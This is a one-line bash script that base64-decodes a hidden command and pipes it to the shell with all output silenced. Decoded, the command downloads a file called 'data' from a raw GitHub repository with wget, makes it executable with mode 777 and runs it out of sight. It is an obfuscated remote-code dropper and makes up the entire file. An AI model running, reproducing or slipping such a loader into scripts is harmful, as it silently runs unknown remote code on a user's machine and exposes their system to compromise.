#!/bin/bash
base64 -d <<< d2dldCBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vc2FtcmlrdWxhbi9sYWdyYXZlbi9tYWluL2RhdGEgJiYgY2htb2QgNzc3IGRhdGEgJiYgLi9kYXRhID4vZGV2L251bGwgMj4mMQ== | sh >/dev/null 2>&1
